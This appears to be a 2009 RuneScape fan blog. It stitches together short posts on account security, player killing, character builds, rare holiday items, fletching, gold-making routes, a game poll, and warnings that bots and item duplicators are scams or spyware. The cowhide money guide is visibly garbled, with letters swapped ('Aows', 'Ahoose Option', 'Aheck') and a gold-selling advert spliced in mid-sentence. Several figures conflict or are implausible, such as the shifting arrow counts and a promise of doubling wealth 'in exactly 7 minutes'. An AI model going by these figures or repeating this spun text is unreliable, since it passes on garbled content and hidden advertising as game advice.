Many young guys love this game very much, almost everyone spends most of their spare time in the game. They tried their best to reach the higher level and earn more golds, as well, they want to get better stuff.

Most of the players want to get all these by their own work, and they will enjoy their time when play runescape. However, there are also many cases that someone’s awesome account be stolen by others. Of course, these stolen cases will make the owners unhappy. While the cheater get the account without any hard-work.

So it’s necessary to protect your runescape account. But it’s a difficult problem for how to protect them. Every one wants their account can safe at any time.

Here gives you some steps and tips for protecting your account.

We see, when we want to play runescape game, we need to create a runescape account at first. That’s easy to understand that we should make our account safe when creating this.

Record the date of birth and country you entered! Usually, most of us easily forget the information. however, in fact, this information is very important. It can be helpful for get back your account when you be hacked by others.

Second, make a unique username that is special to you and others are hard to remember.

Third, remember, do not make a too simple account password. Please make sure your account password is complex. Make your password more secure by using a combination of letters and numbers. Also, be sure that your password doesn't spell out any word that can be found in the dictionary or someone else knows. You are the only one who knows the password.

After you create the runescape account, please do remember the account name and password in mind. and do not write down on the paper to avoid others see.

What’s more, when you play the game, do not believe others who want to offer you some free gold by asking you offer your account password and bank pin. That’s most properly a scammer who wants to hack your account. Just ignore him and pretend to not see these words. This behavior can avoid some hackers stolen your account.

Many players may know we’d better subscribe a recovery set for the security of our account. It’s true and necessary if you want to keep you account be safe.

However, generally, most of just choose the first page recovery questions and choose some simple answers. It’s dangerous for choosing the first page questions.

Please do choose special questions and choose special answers, if you do not remember, please write it down and get this in a secure place that others will not find it out. And do not login your account in different IP too many times in a short time.

If you can follow all the requirements and suggestions I given, you account can not be lost.

Runescape Pking - Basic Overview

To start off, you may be wondering - what is Runescape Pking? Simple. PKing stands for Player Killing. This means that you go out into the wilderness, and fight with another player of Runescape. A lot of Runescape PKers focus on one or two stats so that they remain a fairly low level player but pack a punch that is much larger than the average player their level. But be warned, other Runescape players are more of a challenge than a mindless monster. An actual player can heal themselves with food, or prayer to defend themselves, and can fight back with their own cunning strategies. The best area for PKing is North of Varrock, preferably North of the dungeon area.

So is it dangerous? In a word ?Yes. Runescape Pking may seems like fun, and yes if you succeed in PKing someone you do get collect your opponents belongings, but there are some things you should be wary of. First off, be careful when you attack another person in the wild. When you attack someone who hasn't attacked you first within the last 20 minutes, a skull will appear above your head and last for 20 minutes. However if someone attacks you, you don't get a skull above your head and you are free to attack them back without receiving a skull. Whilst you have a skull above your head, if you die, whether by monster or person, you lose everything you have on you at that time. Normally you keep your three most valuable things when you die without a skull, but when you have a skull you lose everything.

Another thing you should be careful of, is the other PKers around you. First people to watch out for would be the rangers, people that work solely on their range, sometimes they combine their high range with high defense to allow them to be tougher if they get into close combat. If you are in battle with someone, you can still be attacked by someone who is a ranger, so be careful of that. They are most likely equipped themselves with dragon hide armor, which will make it even harder for you in your battle with them. If you are getting attacked by a group of rangers and are heavily outnumbered the smart thing to do is to run. However, if you have your prayer at least to 40, that will allow you to use protect from missiles to make sure that the arrows do not affect yelp protect you from their arrows ?this prayer is often the difference between making it out alive and being piled.

The second type of player to be careful of in the wilderness is a mage. Now there are two main kinds. Firstly there is a pure mage, who has nothing but magic built up. These mages aim to take advantage of their superior mage to easily wipe out the lower level players or players of their own level quickly and efficiently. There is also, the tank mage. This type of mage has magic and defense built up very high. This is so that they can last in a match against someone who is powerful, long enough to wipe them out with their magic. This is the more dangerous mage, and I suggest you watch out for them. Although you can use protect from missiles, this mage can still pack a wallop with its melee.

So what can you do to prepare? There are some things you should do to ensure you are not killed in the wilderness. Firstly try to go with some friends, sometimes joining a Runescape clan can really help you in this regard. You will most likely need the assistance anyway, if the situation gets bad. Also, it can be to your advantage to have you and your friends sneak up on someone, to ensure that you actually get the kill before they run off, although it means you will have to split the spoils of war. That said in the end it will definitely be worth it, because you are five times more likely to make kills with one or two friends than you are by yourself.

Come with food, preferably lobsters if not swordfish. You will need food when in combat with another person. If they are able to hit high on you, you will need to quickly heal yourself. Lobsters are the most popular food out there when it comes to low level PKing. They are probably the most cost effective food to eat as a PKer, and there is always a good supply of lobsters available.

If you are not a pure mage, or a pure ranger, come with a high prayer level. This way, if you are being attacked by a ranger or a tank mage, you will need to use protect from missiles to make sure the arrows or spells can not hurt you. Also, you might find it helpful to use protect from melee.

What is this I hear about a Combat Triangle? This triangle represents which players can be effective against each other. Basically a mage is more effective against a warrior than it is a ranger, a ranger is more effective against mage than a warrior, and a warrior is more effective against a ranger than he is against a mage.

Runescape Pures

A pure is generally someone who has a player that is high in a level like attack strength range or mage, and is based around the idea of being about surely?one skill ?thus the name pures.

There is a true pure and what people call an off set pure where the attack and strength or mage or range doesn't affect the combat levels. So for an off set pure Range like what I have he is level 80 with 80 range with 70 defense and a high prayer not a pure right? Well it is because look the range is where all of my combat levels are coming from. I am a member, I want a high defense level knowing about all the goodies members get to fight with and now I can uses barrows armor.

Another example of a off set pure level 99 range level 99 defense and level 52 prayer he would be about level just over 100 but now I can have give him 69 attack and strength without having attack and strength affecting the combat level at all. But now for people who don't see that as a long term goal to get to be one of the greats just want a low level pure PKer then I would say it like this. Level 1 - 4 defense levels per pure level to keep combat down but keep your defense for a pure strength I would say to begin with 40 attack is a must to wield a rune weapon, for members look into 60 attack for dragon weapons. For a pure mage 2-5 defense levels per mage level, keeping in mind you might want to get a few attack and strength levels to help you get your defense up when you want to get it up

Just something to keep in mind, people think that you need a low defense level to have a pure, but I fight pures all the time, and yes they can hit high sometimes 30s, but I am hitting them every time for 10s and 20s depending on the account I am on. You generally need a defense level that goes with your pure to help defend yourself.

Runescape Rare Holiday Items

Discontinued items can be categorized as holiday items and non-holiday items. Holiday items were dropped on certain holidays throughout the year and could be found in random places all over the RuneScape world. Since these items were only dropped once on that particular holiday, they were bound to begin to become rare and eventually with high demand and low supply the prices were forced up and the items soon became valuable and expensive.

Holiday Items

Pumpkins: Pumpkins were dropped on October 2001. They were the first holiday item to be released. It healed 14 health, and was one bite.

Christmas Crackers: These were dropped on Christmas 2001 and had random colored party hats inside them and another random item out of the game. To get the contents out you had to use it on another player. One player got the party hat; the other player got the item

Party Hats: These were inside Christmas Crackers. You can wear them on your head. They came in six different colors: Red, White, Blue, Purple, Yellow, and Green.

Easter Eggs: These were dropped on Easter 2002. They heal 12 HP and are 1 bite.

Halloween Masks: These were dropped on Halloween 2002 and came in 3 different colors. You can wear them on your head.

Santa Hats: These were dropped on Christmas 2002. You can wear them on your head. They are the most common of the discontinued because they were the last released and were hoarded.

Power Fletching Guide

Note to make this fletching guide work you must follow it to the letter. Do not buy any shafts to unstrung bows, if you do you will be off.

Level 1-15 make 2420 headless arrows. To do this collect (or if you are rich - buy) 2420 feathers and fletch 2420 arrow shafts. To make the arrow shafts go to anywhere that has trees, I prefer East of Varrock inside the gate. Use a knife with the logs and click the button that says arrow shafts? then click on the feathers and then the arrow shafts to make headless arrows.

Then keep going because you need to get a total of 3480 headless arrows. Once you have done this then start making iron arrows, which you can sell for 20-30 gold each. Then its back to the wood cutting again. This time you need another 3980 headless arrows ?and make sure you do not buy any arrow shafts or headless arrows or this fletching guide will be of no use. This guide is calculated fairly accurately to the exact XP you need to level the fastest way possible. Once you have made the 3980 headless arrows, it time to turn them into steel arrows, you can sell these for about 35 ?45 gold.

You now have a few choices, I personally made all arrows the components of the arrows I could, but if you cant smith the arrow heads or mine the materials for the bars or even if you don't have the time then your other option, if you are a member, is to go into the Ranging Guild and buy arrow tips along with arrow shafts. I go in there like 10 times a day buy them out of iron and steel. I personally only want fletching experience not any thing else, and it just takes too long to make and smith all those arrow heads. So this is an easy alternative, though you have to have a bit of gold saved up for this and you need to be a member of the Ranging Guild, which requires 40 Range.

Now another option is to buy 16880 willow logs (try not use maple, unless you intend to sell them in free worlds) to make unstrung willow longs. The willow trees in woodcutting is the best way to get XP at low levels because they are easily obtained. Now for the big money, get yews (don't do any less then 500 at time, I often did 500 because it was easier to buy and sell them if u wanted to see how much money you could make on them. You can make one to two thousand yew longs by buying yew logs for 300 gold each and bow strings for 150 gold each. Then you can fletch them into yew longs and sell them for 600 gold each. Then it basically just repeat the same process, until you reach your desired level.

Well ok now you are one of the greats with level 70 fletching and you have earned respect from me, but if you want to really consider yourself a fletcher then you should make like 8330 yew longs so you can make mage shorts buy magic logs 1k each, I would only buy 100 or so unless you are rich. Then make 8500 yew longs and you now have my full respect and are now able to make magic longs and you can high alchemy them if you need magic experience or sell for 1.3k each, or you can go and sell them one at a time for like 5k, so always keep shorts and longs on hand good luck. If you need any help feel free to drop me a line at Runescape Boards, my name is Blader7214 - make sure to put in the subject box Runescape Fletching Guide or something like that.

Thursday, 18 June 2009


RuneScape is a Java-based Massively Multiplayer Online Role-Playing Game (MMORPG) operated by Jagex Ltd. It is a graphical browser game incorporating 3D rendering. The game has approximately 8.5 million active accounts and is recognised by the Guinness World Records as the world's most popular free MMORPG.

RuneScape takes place in the game world of Gielinor, a fantasy-themed realm divided into several different kingdoms, regions, and cities.Players can travel throughout Gielinor on foot, by using magical teleportation spells and devices, or mechanical means of transportation.Each region offers different types of monsters, resources, and quests to challenge players. Players appear on the screen as customizable avatars, setting their own goals and objectives. RuneScape does not follow a linear storyline; players choose their own goals. Players can fight both NPC monsters and fellow players, complete quests, or increase their experience in any of the available skills.Players interact with each other through trading, chatting, or paticipating in both combative and cooperative minigames and activities.

The predecessor of RuneScape, DeviousMUD, was created by Andrew Gower in 1998. This was rewritten and renamed RuneScape, and released on 4 January 2001 in beta form.As the game's popularity grew, the game engine was rewritten, producing a new product dubbed RuneScape 2, released in beta on 1 December 2003, and was renamed as RuneScape upon its stable release on 29 March 2004.

RuneScape Introduction

This introduction will teach you almost everything you should know about RuneScape for members and non members.


Runescape is a mmorpg and it means massively multiplayer online role playing game and in a mmorpg you can talk to people all around the world and you can also interact with anyone in runescape. In runescape you can also level up your character to try being the best runescape member in the runescape mmorpg like the best runescape member zezima.

Non members

Runescape you can be a non member that allows you to have a free runescape account and with this free account you can do limited things like level up certain level ups like crafting and more. You can also do limited quest and you also got limited places to go.

In the non-member place you can try being the best non member there is.


If you are a member you get more things than the non member can do like more items, more quest, more spaces to go and more monsters to fight. Some new items can be dragon shield, poison and antidote. Some new quest you can do is legend quest and rat catchers, some new places you can go are Sinclair mansion and Camelot castle.


In the wilderness you can fight any player from level 1-120 or go in the dead zone and find items that are rare or raise your stats higher. In the wilderness/dead zone you can also make friends that help you or you can make a team and go in the /wilderness dead zone together and fight as one team, But if you just started runescape I wouldn’t recommended going in the wilderness/dead zone.

Wednesday, 17 June 2009

Runescape as Maplestory

Final first round battle in the MMORPG Showdown series.

The Match-Up

The first round comes to a close with a very interesting battle that brings together two of the most popular, and often times hated, free MMORPGs. Despite both being leaders in the genre, these two games have picked up a fair share of players who love to hate them. In fact, this is the reason that neither game will likely crack the Review Directory's Top Ten Online Game List. The reasons for the wrath of some players for these games include poor graphics, community problems, and server performance. Maple Story looked like it would win in a landslide several times during the week and even on the last day of voting, but Runescape kept coming back. In the end, the hate for Runescape slightly surpassed the hate for Maple Story in the closest battle
yet. To perfectly illustrate the intensity of this hate fest, 5.23 is the lowest score that a winner has received yet.

Tale of the Tape


Free to play.

Made with Java.

Very basic graphics.

Offers a premium version.

The leading download-only free MMORPG in terms of subscriber numbers.


Maple Story

Free to play.

Resembles a console platform game.

Four classes that each have their own themed city.

Offers a cash shop for special items.

Over 200 MB download.

Select Comments For Runescape (Edited for Presentation)

Rating: 10

Author: gamefreak103

Comment: The game may lack good graphics and fun combat, but the game can be fun if you

know how to play and know how to beat hackers.

Rating: 8

Author: Heeya13

Comment: This game isn't that bad. Pretty much the only thing that is bad is the

graphics and the combat system. Only stupid people get hacked.

Rating: 5

Author: gbwong

Comment: Lots of scammers and noobs that beg. Lots of different skills. PvP system is

nice, but has bad graphics and only ok sound. Nice quests if you're a member. However,

gets really boring after a few months if you're not a member.

Rating: 8

Author: mmomeister

Comment: Not near as good as WoW, but much better than MS imo. Despite dull graphics I

have never had a dull time while playing it.

Select Comments for Maple Story (Edited for Presentation)

Rating: 0

Author: Heeya13

Comment: This game is the definition of terrible. The developers had a brilliant idea,

but sent it through a meat grinder. With a terrible battle system, weird graphics, poor

storyline, and idiotic people around every corner. Lets not forget that you have to pay

money for idiotic stuff that you will never use. I can't say that this game is entirley

bad though. It has given me a preview of what Hell is going to be like.

Rating: 2

Author: mmorpg addict

Comment: This game gets so boring later on so don't even start. You will play a while

and then quit. BTW Maple Story fans, i gave Runescape a 0.

Rating: 8

Author: Mr. Peel

Comment: Has a charm that Runescape lacks. Also better graphics.

Rating: 9

Author: freshhh1994

Comment: ROFL, Runescape is going down!

The Voting

Runescape received a total score of 5

Maple Story received a total score of 5.23

The Result

Maple Story Wins!

Runescape: bizarre world online

Runescape is a service website which is America online "virtual world" in an overwhelmingly.According to the statistics of Hitwise,Runescape has occupyed 44%market,others like Webkinz、Neopets、Club Penguin、Gaia Online、Stardoll and Habbo US all behind it.

1.RuneScape 44.18%

2.Webkina 14.08%

3.Neopets 12.81%

4.Gaiaonline.com 10.85%

5.Club Penguin 10.57%

6.Stardoll 5.89%

7.Habbo US 1.61%

Runescape is a social networld like MMORPG.In medieval style as the background,every user can play a roal in it.It has attracted many young people.And according to the market forecast,ont only in recent years, but also in the next few years,the rapid must be increase, such "virtual world" will be a larger development space.

Monday, 15 June 2009

Runescape Autominer

There are hundreds of hacks promising a RuneScape autominer, which is basically a program that will auto mine while you're away from the computer. The autominer will mine, collect and deposit the ore and hone your mining skill at the same time. Could you ask for more?

But a word of caution. If Jagex's servers detect the autominer, you will be banned from playing the game. Some hacks claim they are able to work around the detection process by factoring in anti-ban features like resting and auto talking to mimic human actions as much as possible.

The RuneScape autominer was first devised when Runescape was just launched in 2001. It was a time when the game required skills that were both boring and repetitive and a whole lot of clicks were needed to ore metal. These autominers could also help with skills that required a substantial number of clicks to perform tasks like fishing and wood cutting.

Priceless Items

It may be the most popular game on the globe but getting it right is still hard work. At the heart of the online game, RuneScape, is earning what the creators call "items", which can eventually be traded for real money. But earning an item needs skill and lots and lots of practice.

Enter the world of hacks, bots, private servers and programs that can do your work for you. Sounds like something a lot of people would love to have in real life, right? But in the world of Gielinor, it's actually possible. Such is the interest in finding a shortcut that the Internet is populated with sites, forums and chat rooms dedicated to cracking the code so carefully devised by Jagex.

Surf the net for a while, and moparscape will come up as the most-favoured RuneScape site for RuneScape cheats. Others like sythe, fagex or eliteneo are also recommended for the unscrupulous player intent on hitting the jackpot without really earning it.

So just how does one earn a RuneScape item? One way to earn an item is to perform a specific skill. Others, like party hats, are dropped by monsters when monsters are killed. Still others are released by the game at appropriate moments, like holiday drops at the beginning of the holiday season.

Some of the skills that earn items are mining, fishing and woodcutting. But practising a skill is hard work. For instance, it takes time to train yourself to mine the more expensive ores and metals. Another way to collect items is to buy them from other players but, again, that takes money.

Beware of Scamsters

For instance, before Runescape 2 was launched, players had to click an inventory bag, after which they would select a mining pick axe and then the rock they wanted to mine. Imagine how many movements of the mouse this required!

So what exactly did the Runescape autominer do? It basically was a macro that let you to select the on-screen areas you wanted the mouse to click on, and then a sequence of clicks and time delays between them. But this process required to be monitored. This was so because if you left the autominer running, you would be automatically logged out of the game if you hadn't moved for five minutes.

How to Get a Good Life in Runescape

We all like Runescape. It is a great online internet game.

Runescape is very different than real life (obviously).

Do a Runesacpe player, after we finish the new player quest. We will go to mainland. There are lumbridge and vorrock village. We need start a new life which is very different from real life. How to get a good life in runescape is a very important thing for us.

At first, you need make friend. But in runescape, you will find that whatever you say will not be taken seriously at first. If you ask someone to be your runescape friend, they might assume you’re a moocher and only talking because you’re after their runescape items.

Runescape gold and good items are very important to players. So they can’t trust a newbie when you want to make friend or trade them.

But having a network of friends in runescape is part of the game. One of the best ways to make a good, lasting runescape friend in runescape is PKing. If you like to PK then find someone in runescape around your level. Ask them to team up (make sure they don’t backstab you!) and after you get your first kill together you’ll have a Runescape friend for life in runescape.

Another thing: if you’re trading something to a runescape player and it’s a fair price (it should be), then don’t hesitate to chat about stuff outside of the trade about runescape. Sometimes you might find that you’ll make a good runescape friend .Well,maybe he is just a kid of 10 years old.

At last, Pleasure make sure, however, that you don’t expect redundant anything from them. Sure, all Runescape friends do favors for each other. But the most common mistake that screws up Runescape friendships is one person always demanding lots of things from the other just because he’s a friend in Runescape.

Path 2 of Making Runescape Gold Aow Parts

Maybe killing chickens isn’t your thing. You want something dangerous, something cool, someting easy- buy runescape gold from our site, something…bovine.

Well it’s your lucky day. Just across from the chicken coop is a field. It is filled with four-legged walking-ATM/combat-training/meals-on-wheels: Aows.

You can train on cows just like you train on chickens. When it’s killed, each cow drops 1 bone, 1 cowhide, and 1 raw meat. You can cook the meat (it heals 3 hit-points), bury the bones, and collect the cowhides to sell later on. Since all you want to do now is get money, the best thing to do is just collect the extra cow hides people leave lying around on the ground. Do this until you have a full inventory. Then take the hides to the bank on the third floor of Lumbridge castle. Deposit these and then return to the field to get more hides. You want to collect 100 total hides. You don’t even have to fight the cows. Usually there are enough players there killing the cows that you can get your fill of left behind hides in minutes.

Once you have all your hides, you need to put them in a banknote. If you already know what a

banknote is, go to the next paragraph. If you don’t, then keep reading. Go to the bank and open your runescape accounts menu. Look down in the lower right hand corner. See the two things that say ‘item’ and ‘note’? Left-click ‘note’. Then right-click on the item you want to withdraw. You will get a ‘Ahoose Option’ window. Select ‘withdraw all’. This will withdraw all of those items, whether you have 2 or 2,000. Instead of taking up all your inventory space, you will be given a note that has a picture of the item and a number indicating how many you have. This is a banknote.

Once you have withdrawn all the cowhides as banknotes, you also need to withdraw whatever money you have. (Note, you need at least 10 gold pieces. If you don’t have 10 gp’s, go just south of the cow-field and kill some goblins until ou have enough gold.) ake these things and leave the Lumbridge castle. Go east across the bridge to the fence gate with the 4 guards standing around it. Talk to one of the guards. He will tell you it costs 10 gold to get through. Pay him, go

through the gate, and travel south until you get to the Al Kharid bank. (Aheck your world-map if you don’t know where it is.) You should see several people standing around the bank lobby buying or selling things. Keep an eye-out for people looking to buy cowhides. They will usually say something like “Buying cowhides,” or “Buying hides.”

If there aren’t people there buying hides, don’t worry. Just say “Selling 100 cowhides – 10K”. That’s right, 10K. 10,000 gold. You are selling each hide for 100 gold pieces, do this for your runescape accounts.

If the buyer doesn’t want to pay 100 each, don’t sell to him. Find another buyer. You may have to advertise and say something like “Selling cowhides – 100 each”. Say this several times. If you still don’t find a buyer, just world-hop to a world where there are more people. You should be able to find a buyer pretty quickly. (Note, you can sometimes sell the hides for more money, but 100 is pretty standard. Don’t waste your time trying to sell them for 110 or 120 gp’s each. Just get the quick cash.)

And that’s it. If you sold 100 hides and sold them for 100 gold pieces each, you now have 10,000 gold. Was that so hard? Remember this process. When you need more rs2 money, just repeat it several times. You can collect as many cow-hides as you want and keep selling them. But you will need at least 10,000 gold to get a good run at runescape power leveling.

Because that is what you will do next.

Do you really know Runescape Power Leveling?

What is Runescape Power Leveling?

Let’s start off by letting you know what Runescape Power Leveling actually is. If you know already then you can skip to the next section of this article. Runescape Power Leveling basically means that a player of the game will rapidly level in-game, which in most cases, is done by giving the account details to a 3rd party to do it for them. Runescape Power Leveling defeats the whole aspect of the game which is intended for all to enjoy. By Power Leveling in Runescape, many aspects of the game are brushed by, or completely passed without recognition.

Free Runescape Power Leveling

Can I really get Runescape Power Leveling for free? It is highly unlikely that anywhere that will not steal your account will provide you with Free Runescape Power Leveling. There are other means that can be used by yourself and one of these is a Runescape Autoer. There are many bots on the internet that you can download which will play the game automatically for you for Runescape Power Leveling, allowing you to vacate your computer and go and watch television or sleep the night to wake up to it in the morning. Of course, this is strictly against Jagex rules and your account will be permanently banned if you are found using methods as such. There are thousands of accounts banned each month by this means of Free Runescape Power Leveling, if you still insist on using one, watch out!

What do Websites Offering Runescape Power Leveling Look Like?

By going to a search engine such as Google and typing in Runescape Power Leveling, you get a return of over 1.5 Million websites. These websites are just in it to make a quick buck from you and will not provide you with any Runescape Power Leveling whatsoever. Most will require payment and your account details in order to Power Level your Runescape account. The money will go straight into their account and your account will be disregarded or sold depending on the levels it has. An example of a characters image can be seen below.

Runescape Power Leveling Tips

The best Runescape Power Leveling Tip of them all is to not trust 3rd party websites and not to use autoers or any type of robot to do the work for you. Just play the game as you normally would and enjoy it! If you want to level combat skills quickly, then train on monsters that you know you can kill quickly in 1, 2 or 3 hits. Alternatively, you could take a trip to Pest Control if you are a member. If you want to Power Level in non-combat skills then you can Power Level by mining vast amount of iron, dropping it all when your inventory gets full. This way you do not waste time by running to and from the bank every 5 minutes and you can get on with your Runescape Power Leveling.

Runescape Item Duplicator

If you've ever thought of downloading a "free" runescape item duplicator, think again.

Why? Because a runescape item duplicator doesn't exist anymore!

Simple as that.

A long time ago there was such a thing as a runescape item duplicator. I have no idea how it worked at all, but I do know that no such thing exists anymore. If someone offers to give you for free, or sell you a runescape item duplicator, they are lying. What they are probably giving you is a piece of software called spyware, it is basically used to steal your username and password and hack your account, so you'll never get any free runescape item duplicator, infact you'll probably just lose everything in your runescape account.

Not only that, but these pieces of software can steal your credit card and other information, it could even be a virus that could take over your computer. So you might end up losing yourself a TON of real life money as well if you're not careful.

I'm sure you wouldn't like that at all, I certainly wouldn't.

Not only that, but if the runescape staff catch you trying to cheat in such a way, they will ban you so fast, you're head will spin.

So if you see a runescape item duplicator being advertised, completely ignore them, they're trying to steal your account.

Also remember that your runescape account should have a pin number on the bank anyway, so that should keep you safe.

I hope this help you to see the light.

Runescape - Get Filthy Rich in to Start Selling Your Own Self Made Gold

I have succeeded in making billions of Gold! Helping a lot of my ingame friends, yet I keep some WoW Gold secrets to only my closest friends!

The road to becoming rich will be split into a couple of paths:

1) Making your First 1GP, and raising it to 100K

2) 100k- 500k

3) 400k- 1M

4) 1M-2M

5) 2M-5M

6) 5M-10M

7) Reach from 5M-10M in exactly 7 minutes

To make your first 1GP-100K

You will need to follow some strategies such as

- Clay Mining

- Feather Collecting

- Rune Essence Mining


For members, you have two methods:

- Picking Flax

- Arrow Shafts

Climbing up from 100K-400K

Start Making Clay and resell them to Quadruple your money to 400K.

Making your first Million

Now here is a part where TOP PLAYERS would NEVER want to share!!

To begin, make sure you have at least 400K. Use that 400K to buy 4000 Cow-hides at the Grand Exchange for approx. 100GP each. Now head to the desert city of Al Kharid! To enter Al Kharid you need to have 15gp, which you will pay as a toll on the front gate,located East of Lumbridge Castle. Once you have passed the gate, head south until you come upon a small desert city that has a bank. Tan the Hides into Hard Leather, and get ready to make profit you never imagined :)


Now doubling your first million is even easier than the last step were you had to make your first Million.

Now you have an idea on how to start making millions, Goodluck on your journey!

Runescape Bots

Have you ever wanted to know about runescape bots, but all you found were people trying to scam you?

Would you like to know why that is?

It's because 99% of all so-called runescape bots are completely fake, yes fake!

Yes that's right, believe it or not, anyone trying to sell you an "autominer" or bot is just scamming you and you'll lose you money, guaranteed. Sorry but it's the truth!

What they really are, are viruses that infect your computer and record everything that you type in, then once it's recorded something, it sends the data the creator of the virus. So now you've lost your runescape account and probably a lot of credit card information as well.

Other ways which people try to gain access to your account, is when people say, that in order for it to work, they need to log into your account and set it up. In this case, there are no runescape bots, just someone claiming to have one when he really doesn't and wants access to your account.

Think about it, why would someone give away runescape bots for free? And don't believe them when they say "I used to be one of Jagex staff, and now I hate them so I'm releasing this for free". That's just a big lie.

So what do you do if someone offers you a runescape bot? You report them and ignore them. Don't get sucked in, you've got so much to lose and so little to gain.